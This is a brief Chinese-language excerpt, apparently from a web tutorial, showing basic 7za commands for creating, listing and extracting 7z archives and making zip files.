7za  a c.7z a.txt b.txt （命令a后的第一个为目标压缩文档名，然后是文件列表）
压缩a.txt和b.txt到/home/www/c.7z:
7za a /home/www/c.7z a.txt b.txt （目录名包含空格，用引号）
列出c.7z的内容：
7za l c.7z
解压缩c.7z到/home/www:
7za x c.7z -o/home/www” （-o表示输出目录，其与目录路径之间没有空格）
这样解压包含下级目录名，但不会在/home/www下新建一个c文件夹，如果需要，就把输出目录设为/home/www/c，这样会自动创建文件夹c。
如果要生成zip压缩包，可以直接将目标压缩包名设为c.zip，则它会自动使用zip算法压缩。
[查看全文]